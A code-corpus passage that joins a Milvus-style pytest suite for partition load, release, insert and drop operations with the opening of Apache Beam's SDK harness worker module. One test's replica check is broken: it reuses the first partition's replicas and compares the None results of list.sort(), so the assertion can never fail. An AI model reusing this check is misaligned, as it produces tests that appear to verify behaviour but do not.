target: test load replica change
method: 1.load with replica 1
2.load with a new replica number
3.release partition
4.load with a new replica
expected: The second time successfully loaded with a new replica number
"""
# create, insert
self._connect()
collection_w = self.init_collection_wrap()
partition_w = self.init_partition_wrap(collection_w)
partition_w.insert(cf.gen_default_list_data())
assert partition_w.num_entities == ct.default_nb
partition_w.load(replica_number=1)
collection_w.query(expr=f"{ct.default_int64_field_name} in [0]", check_task=CheckTasks.check_query_results,
check_items={'exp_res': [{'int64': 0}]})
error = {ct.err_code: 5, ct.err_msg: f"Should release first then reload with the new number of replicas"}
partition_w.load(replica_number=2, check_task=CheckTasks.err_res, check_items=error)
partition_w.release()
partition_w.load(replica_number=2)
collection_w.query(expr=f"{ct.default_int64_field_name} in [0]", check_task=CheckTasks.check_query_results,
check_items={'exp_res': [{'int64': 0}]})
two_replicas, _ = collection_w.get_replicas()
assert len(two_replicas.groups) == 2
# verify loaded segments included 2 replicas and twice num entities
seg_info, _ = self.utility_wrap.get_query_segment_info(collection_w.name)
seg_ids = list(map(lambda seg: seg.segmentID, seg_info))
num_entities = list(map(lambda seg: seg.num_rows, seg_info))
assert reduce(lambda x, y: x ^ y, seg_ids) == 0
assert reduce(lambda x, y: x + y, num_entities) == ct.default_nb * 2
@pytest.mark.tags(CaseLabel.ClusterOnly)
def test_partition_replicas_change_cross_partitions(self):
"""
target: test load with different replicas between partitions
method: 1.Create two partitions and insert data
2.Load two partitions with different replicas
expected: Raise an exception
"""
# Create two partitions and insert data
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
partition_w1.insert(cf.gen_default_dataframe_data())
partition_w2.insert(cf.gen_default_dataframe_data(start=ct.default_nb))
assert collection_w.num_entities == ct.default_nb * 2
# load with different replicas
partition_w1.load(replica_number=1)
partition_w1.release()
partition_w2.load(replica_number=2)
# verify different have same replicas
replicas_1, _ = partition_w1.get_replicas()
replicas_2, _ = partition_w2.get_replicas()
group1_ids = list(map(lambda g: g.id, replicas_1.groups))
group2_ids = list(map(lambda g: g.id, replicas_1.groups))
assert group1_ids.sort() == group2_ids.sort()
# verify loaded segments included 2 replicas and 1 partition
seg_info, _ = self.utility_wrap.get_query_segment_info(collection_w.name)
seg_ids = list(map(lambda seg: seg.segmentID, seg_info))
num_entities = list(map(lambda seg: seg.num_rows, seg_info))
assert reduce(lambda x, y: x ^ y, seg_ids) == 0
assert reduce(lambda x, y: x + y, num_entities) == ct.default_nb * 2
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release(self):
"""
target: verify release partition
method: 1. create a collection and two partitions
2. insert data into each partition
3. flush and load the partition1
4. release partition1
5. release partition2
expected: 1. the 1st partition is released
2. the 2nd partition is released
"""
# create collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
# insert data to two partition
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
# load two partitions
partition_w1.load()
# search partition1
search_vectors = cf.gen_vectors(1, ct.default_dim)
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res1) == 1
# release the first partition
partition_w1.release()
partition_w2.release()
# check result
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "partitions have been released"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("data", [cf.gen_default_dataframe_data(10),
cf.gen_default_list_data(10),
cf.gen_default_tuple_data(10)])
def test_partition_insert(self, data):
"""
target: verify insert entities multiple times
method: 1. create a collection and a partition
2. partition.insert(data)
3. insert data again
expected: insert data successfully
"""
nums = 10
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name,
"is_empty": True, "num_entities": 0}
)
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name]) # don't need flush for issue #5737
assert not partition_w.is_empty
assert partition_w.num_entities == nums
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert not partition_w.is_empty
assert partition_w.num_entities == (nums + nums)
class TestPartitionOperations(TestcaseBase):
""" Test case of partition interface in operations """
@pytest.mark.tags(CaseLabel.L1)
def test_partition_dropped_collection(self):
"""
target: verify create partition against a dropped collection
method: 1. create a collection
2. drop collection
3. create partition in collection
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# drop collection
collection_w.drop()
# create partition failed
self.partition_wrap.init_partition(collection_w.collection, cf.gen_unique_str(prefix),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_same_name_in_diff_collections(self):
"""
target: verify create partitions with same name in diff collections
method: 1. create a partition in collection1
2. create a partition in collection2
expected: create successfully
"""
# create two collections
collection_w1 = self.init_collection_wrap()
collection_w2 = self.init_collection_wrap()
# create 2 partitions in 2 diff collections
partition_name = cf.gen_unique_str(prefix)
self.init_partition_wrap(collection_wrap=collection_w1, name=partition_name)
self.init_partition_wrap(collection_wrap=collection_w2, name=partition_name)
# check result
assert collection_w1.has_partition(partition_name)[0]
assert collection_w2.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_multi_partitions_in_collection(self):
"""
target: verify create multiple partitions in one collection
method: create multiple partitions in one collection
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
for _ in range(10):
partition_name = cf.gen_unique_str(prefix)
# create partition with different names and check the partition exists
self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="skip temporarily for debug")
def test_partition_maximum_partitions(self):
"""
target: verify create maximum partitions
method: 1. create maximum partitions
2. create one more partition
expected: raise exception
"""
threads_num = 8
threads = []
def create_partition(collection, threads_n):
for _ in range(ct.max_partition_num // threads_n):
name = cf.gen_unique_str(prefix)
par_wrap = ApiPartitionWrapper()
par_wrap.init_partition(collection, name, check_task=CheckTasks.check_nothing)
collection_w = self.init_collection_wrap()
for _ in range(threads_num):
t = threading.Thread(target=create_partition, args=(collection_w.collection, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
p_name = cf.gen_unique_str()
self.partition_wrap.init_partition(
collection_w.collection, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "maximum partition's number should be limit to 4096"})
# TODO: Try to verify load collection with a large number of partitions. #11651
@pytest.mark.tags(CaseLabel.L0)
def test_partition_drop_default_partition(self):
"""
target: verify drop the _default partition
method: drop the _default partition
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
default_partition, _ = collection_w.partition(ct.default_partition_name)
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert default_partition.name == partition_w.name
# verify that drop partition with error
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "default partition cannot be deleted"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_drop_partition_twice(self):
"""
target: verify drop the same partition twice
method: 1.create a partition with default schema
2. drop the partition
3. drop the same partition again
expected: raise exception for 2nd time
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
collection_w.has_partition(partition_name)
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
# verify that drop the partition again with exception
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: PartitionErrorMessage.PartitionNotExist})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_create_and_drop_multi_times(self):
"""
target: verify create and drop for times
method: 1. create a partition with default schema
2. drop the partition
3. loop #1 and #2 for times
expected: create and drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# range for 5 times
partition_name = cf.gen_unique_str(prefix)
for i in range(5):
# create partition and check that the partition exists
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop partition and check that the partition not exists
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_partition_drop_non_empty_partition(self):
"""
target: verify drop a partition which has data inserted
method: 1. create a partition with default schema
2. insert some data
3. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data())
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("data", [cf.gen_default_list_data(nb=3000)])
@pytest.mark.parametrize("index_param", cf.gen_simple_index())
def test_partition_drop_indexed_partition(self, data, index_param):
"""
target: verify drop an indexed partition
method: 1. create a partition
2. insert same data
3. create an index
4. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
ins_res, _ = partition_w.insert(data)
assert len(ins_res.primary_keys) == len(data[0])
# create index of collection
collection_w.create_index(ct.default_float_vec_field_name, index_param)
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_release_empty_partition(self):
"""
target: verify release an empty partition
method: 1. create a partition
2. release the partition
expected: release successfully
"""
# create partition
partition_w = self.init_partition_wrap()
assert partition_w.is_empty
# release partition
partition_w.release()
# TODO: assert no more memory consumed
@pytest.mark.tags(CaseLabel.L2)
def test_partition_release_dropped_partition(self):
"""
target: verify release a dropped partition
method: 1. create a partition
2. drop the partition
3. release the partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# release the dropped partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: PartitionErrorMessage.PartitionNotExist})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_release_dropped_collection(self):
"""
target: verify release a dropped collection
method: 1. create a collection and partition
2. drop the collection
3. release the partition
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# release the partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_after_collection_released(self):
"""
target: verify release a partition after the collection released
method: 1. create a collection and partition
2. insert some data
3. release the collection
4. release the partition
expected: partition released successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
data = cf.gen_default_list_data()
partition_w.insert(data)
assert partition_w.num_entities == len(data[0])
assert collection_w.num_entities == len(data[0])
# load partition
partition_w.load()
# search of partition
search_vectors = cf.gen_vectors(1, ct.default_dim)
res_1, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res_1) == 1
# release collection
collection_w.release()
# search of partition
res_2, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 0,
ct.err_msg: "not loaded into memory"})
# release partition
partition_w.release()
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_default_partition(self):
"""
target: verify insert data into _default partition
method: 1. create a collection
2. insert some data into _default partition
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
partition_name = ct.default_partition_name
assert collection_w.has_partition(partition_name)[0]
partition_w = self.init_partition_wrap(collection_w, partition_name)
# insert data to partition
data = cf.gen_default_dataframe_data()
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == len(data)
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_dropped_partition(self):
"""
target: verify insert data into a dropped partition
method: 1. create a collection
2. insert some data into a dropped partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition not exist"})
# TODO: update the assert error
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_dropped_collection(self):
"""
target: verify insert data into a dropped collection
method: 1. create a collection
2. insert some data into a dropped collection
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "None Type"})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_insert_maximum_size_data(self):
"""
target: verify insert maximum size data(256M?) a time
method: 1. create a partition
2. insert maximum size data
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w)
# insert data to partition
max_size = 100000 # TODO: clarify the max size of data
ins_res, _ = partition_w.insert(cf.gen_default_dataframe_data(max_size), timeout=40)
assert len(ins_res.primary_keys) == max_size
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == max_size
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("dim", [ct.default_dim - 1, ct.default_dim + 1])
def test_partition_insert_mismatched_dimensions(self, dim):
"""
target: verify insert maximum size data(256M?) a time
method: 1. create a collection with default dim
2. insert dismatch dim data
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
data = cf.gen_default_list_data(nb=10, dim=dim)
# insert data to partition
partition_w.insert(data, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "but entities field dim"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("sync", [True, False])
def test_partition_insert_sync(self, sync):
"""
target: verify insert sync
method: 1. create a partition
2. insert data in sync
expected: insert successfully
"""
pass
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("data", [cf.gen_default_list_data(nb=3000)])
@pytest.mark.parametrize("index_param", cf.gen_simple_index())
def test_partition_delete_indexed_data(self, data, index_param):
"""
target: verify delete entities with an expression condition from an indexed partition
method: 1. create collection
2. create an index
3. create a partition
4. insert same data
5. delete entities with an expression condition
expected: delete successfully
issue #15456
"""
# create collection
collection_w = self.init_collection_wrap()
# create index of collection
collection_w.create_index(ct.default_float_vec_field_name, index_param)
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
ins_res, _ = partition_w.insert(data)
assert len(ins_res.primary_keys) == len(data[0])
# delete entities with an expression condition
expr = "int64 in [0,1]"
res = partition_w.delete(expr)
assert len(res) == 2
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_repeat(self):
"""
target: test create partition, check status returned
method: call function: create_partition
expected: status is ok
"""
# create partition
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
partition_e = self.init_partition_wrap(collection_w, partition_w.name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_name_none(self):
"""
target: test create partition,partition name set None, check status returned
method: call function: create_partition
expected: status ok
"""
collection_w = self.init_collection_wrap()
partition_name = None
partition_w = self.init_partition_wrap(collection_w, partition_name)
class TestShowBase(TestcaseBase):
"""
******************************************************************
The following cases are used to test list partition
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions(self):
"""
target: test show partitions, check status and partitions returned
method: create partition first, then call : collection.partitions
expected: status ok, partition correct
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.partitions[1].name == partition_w.name
@pytest.mark.tags(CaseLabel.L0)
def test_show_multi_partitions(self):
"""
target: test show partitions, check status and partitions returned
method: create partitions first, then call : collection.partitions
expected: status ok, partitions correct
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
partition_e = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.partitions[1].name == partition_w.name
assert collection_w.partitions[1].name == partition_e.name
class TestHasBase(TestcaseBase):
"""
******************************************************************
The following cases are used to test `has_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_a(self):
"""
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_w.name)
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_multi_partitions(self):
"""
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w1 = self.init_partition_wrap(collection_w, partition_name)
partition_w2 = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_w1.name)
assert collection_w.has_partition(partition_w2.name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition_name_not_existed(self):
"""
target: test has_partition, check status and result
method: then call function: has_partition, with partition name not existed
expected: status ok, result empty
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition_collection_not_existed(self):
"""
target: test has_partition, check status and result
method: then call function: has_partition, with collection not existed
expected: status not ok
"""
collection_w = self.init_collection_wrap()
collection_e = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w1 = self.init_partition_wrap(collection_w, partition_name)
assert not collection_e.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition_with_invalid_partition_name(self):
"""
target: test has partition, with invalid partition name, check status returned
method: call function: has_partition
expected: status ok
"""
collection_w = self.init_collection_wrap()
partition_name = ct.get_invalid_strs
collection_w.has_partition(partition_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"})
class TestDropBase(TestcaseBase):
"""
******************************************************************
The following cases are used to test `drop_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_repeatedly(self):
"""
target: test drop partition twice, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status not ok, no partitions in db
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
# drop partition
collection_w.drop_partition(partition_w.name)
# check that the partition not exists
assert not collection_w.has_partition(partition_name)[0]
collection_w.drop_partition(partition_w.name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "Partition not exist"})
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_create(self):
"""
target: test drop partition, and create again, check status
method: create partitions first, then call function: drop_partition, create_partition
expected: status is ok, partition in db
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
collection_w.drop_partition(partition_w.name)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_w.name)
class TestNameInvalid(TestcaseBase):
"""
******************************************************************
The following cases are used to test invalid partition name
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_name(self):
"""
target: test drop partition, with invalid partition name, check status returned
method: call function: drop_partition
expected: status not ok
"""
collection_w = self.init_collection_wrap()
partition_name = ct.get_invalid_strs
collection_w.drop_partition(partition_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"})
|
sdk_worker.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import functools
import logging
import queue
import sys
import threading
import time
import traceback
from builtins import object
from concurrent import futures
from typing import TYPE_CHECKING
from typing import Any
from typing import Callable
from typing import DefaultDict
from typing import Dict
from typing import FrozenSet
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Tuple
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.coders import coder_impl
from apache_beam.metrics import monitoring_infos
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import metrics_pb2
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import statesampler
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.data_plane import PeriodicThread
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
from apache_beam.runners.worker.worker_status import FnApiWorkerStatusHandler
from apache_beam.runners.worker.worker_status import thread_dump
from apache_beam.utils import thread_pool_executor
if TYPE_CHECKING:
from apache_beam.portability.api import endpoints_pb2
from apache_beam.utils.profiler import Profile
_LOGGER = logging.getLogger(__name__)
# This SDK harness will (by default), log a "lull" in processing if it sees no
# transitions in over 5 minutes.
# 5 minutes * 60 seconds * 1000 millis * 1000 micros * 1000 nanoseconds
DEFAULT_LOG_LULL_TIMEOUT_NS = 5 * 60 * 1000 * 1000 * 1000
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S = 60
# Full thread dump is performed at most every 20 minutes.
LOG_LULL_FULL_THREAD_DUMP_INTERVAL_S = 20 * 60
# Full thread dump is performed if the lull is more than 20 minutes.
LOG_LULL_FULL_THREAD_DUMP_LULL_S = 20 * 60
class ShortIdCache(object):
""" Cache for MonitoringInfo "short ids"
"""
def __init__(self):
self._lock = threading.Lock()
self._lastShortId = 0
self._infoKeyToShortId = {} # type: Dict[FrozenSet, str]
self._shortIdToInfo = {} # type: Dict[str, metrics_pb2.MonitoringInfo]
def getShortId(self, monitoring_info):
# type: (metrics_pb2.MonitoringInfo) -> str
""" Returns the assigned shortId for a given MonitoringInfo, assigns one if
not assigned already.
"""
key = monitoring_infos.to_key(monitoring_info)
with self._lock:
try:
return self._infoKeyToShortId[key]
except KeyError:
self._lastShortId += 1
# Convert to a hex string (and drop the '0x') for some compression
shortId = hex(self._lastShortId)[2:]
payload_cleared = metrics_pb2.MonitoringInfo()
payload_cleared.CopyFrom(monitoring_info)
payload_cleared.ClearField('payload')
self._infoKeyToShortId[key] = shortId
self._shortIdToInfo[shortId] = payload_cleared
return shortId
def getInfos(self, short_ids):
#type: (Iterable[str]) -> List[metrics_pb2.MonitoringInfo]
""" Gets the base MonitoringInfo (with payload cleared) for each short ID.
Throws KeyError if an unassigned short ID is encountered.
"""
return [self._shortIdToInfo[short_id] for short_id in short_ids]
SHORT_ID_CACHE = ShortIdCache()
class SdkHarness(object):
REQUEST_METHOD_PREFIX = '_request_'
def __init__(self,
control_address, # type: str
credentials=None,
worker_id=None, # type: Optional[str]
# Caching is disabled by default
state_cache_size=0,
# time-based data buffering is disabled by default
data_buffer_time_limit_ms=0,
profiler_factory=None, # type: Optional[Callable[..., Profile]]
status_address=None, # type: Optional[str]
):
self._alive = True
self._worker_index = 0
self._worker_id = worker_id
self._state_cache = StateCache(state_cache_size)
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if credentials is None:
_LOGGER.info('Creating insecure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.insecure_channel(
control_address, options=options)
else:
_LOGGER.info('Creating secure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.secure_channel(
control_address, credentials, options=options)
grpc.channel_ready_future(self._control_channel).result(timeout=60)
_LOGGER.info('Control channel established.')
self._control_channel = grpc.intercept_channel(
self._control_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
credentials, self._worker_id, data_buffer_time_limit_ms)
self._state_handler_factory = GrpcStateHandlerFactory(
self._state_cache, credentials)
self._profiler_factory = profiler_factory
self._fns = KeyedDefaultDict(
lambda id: self._control_stub.GetProcessBundleDescriptor(
beam_fn_api_pb2.GetProcessBundleDescriptorRequest(
process_bundle_descriptor_id=id))
) # type: Mapping[str, beam_fn_api_pb2.ProcessBundleDescriptor]
# BundleProcessor cache across all workers.
self._bundle_processor_cache = BundleProcessorCache(
state_handler_factory=self._state_handler_factory,
data_channel_factory=self._data_channel_factory,
fns=self._fns)
if status_address:
try:
self._status_handler = FnApiWorkerStatusHandler(
status_address, self._bundle_processor_cache
) # type: Optional[FnApiWorkerStatusHandler]
except Exception:
traceback_string = traceback.format_exc()
_LOGGER.warning(
'Error creating worker status request handler, '
'skipping status report. Trace back: %s' % traceback_string)
else:
self._status_handler = None
# TODO(BEAM-8998) use common
# thread_pool_executor.shared_unbounded_instance() to process bundle
# progress once dataflow runner's excessive progress polling is removed.
self._report_progress_executor = futures.ThreadPoolExecutor(max_workers=1)
self._worker_thread_pool = thread_pool_executor.shared_unbounded_instance()
self._responses = queue.Queue(
) # type: queue.Queue[beam_fn_api_pb2.InstructionResponse]
_LOGGER.info('Initializing SDKHarness with unbounded number of workers.')
def run(self):
self._control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(
self._control_channel)
no_more_work = object()
def get_responses():
# type: () -> Iterator[beam_fn_api_pb2.InstructionResponse]
while True:
response = self._responses.get()
if response is no_more_work:
return
yield response
self._alive = True
try:
for work_request in self._control_stub.Control(get_responses()):
_LOGGER.debug('Got work %s', work_request.instruction_id)
request_type = work_request.WhichOneof('request')
# Name spacing the request method with 'request_'. The called method
# will be like self.request_register(request)
getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
work_request)
finally:
self._alive = False
_LOGGER.info('No more requests from control plane')
_LOGGER.info('SDK Harness waiting for in-flight requests to complete')
# Wait until existing requests are processed.
self._worker_thread_pool.shutdown()
# get_responses may be blocked on responses.get(), but we need to return
# control to its caller.
self._responses.put(no_more_work)
# Stop all the workers and clean all the associated resources
self._data_channel_factory.close()
self._state_handler_factory.close()
self._bundle_processor_cache.shutdown()
if self._status_handler:
self._status_handler.close()
_LOGGER.info('Done consuming work.')
def _execute(self,
task, # type: Callable[[], beam_fn_api_pb2.InstructionResponse]
request # type: beam_fn_api_pb2.InstructionRequest
):
# type: (...) -> None
with statesampler.instruction_id(request.instruction_id):
try:
response = task()
except Exception: # pylint: disable=broad-except
traceback_string = traceback.format_exc()
print(traceback_string, file=sys.stderr)
_LOGGER.error(
'Error processing instruction %s. Original traceback is\n%s\n',
request.instruction_id,
traceback_string)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=traceback_string)
self._responses.put(response)
def _request_register(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
# registration request is handled synchronously
self._execute(lambda: self.create_worker().do_instruction(request), request)
def _request_process_bundle(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_execute(request)
def _request_process_bundle_split(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_process_bundle_action(request)
def _request_process_bundle_progress(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_process_bundle_action(request)
def _request_process_bundle_action(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
def task():
instruction_id = getattr(
request, request.WhichOneof('request')).instruction_id
# only process progress/split request when a bundle is in processing.
if (instruction_id in
self._bundle_processor_cache.active_bundle_processors):
self._execute(
lambda: self.create_worker().do_instruction(request), request)
else:
self._execute(
lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
error=('Unknown process bundle instruction {}').format(
instruction_id)),
request)
self._report_progress_executor.submit(task)
def _request_finalize_bundle(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_execute(request)
def _request_execute(self, request):
def task():
self._execute(
lambda: self.create_worker().do_instruction(request), request)
self._worker_thread_pool.submit(task)
_LOGGER.debug(
"Currently using %s threads." % len(self._worker_thread_pool._workers))
def create_worker(self):
return SdkWorker(
self._bundle_processor_cache,
state_cache_metrics_fn=self._state_cache.get_monitoring_infos,
profiler_factory=self._profiler_factory)
class BundleProcessorCache(object):
"""A cache for ``BundleProcessor``s.
``BundleProcessor`` objects are cached by the id of their
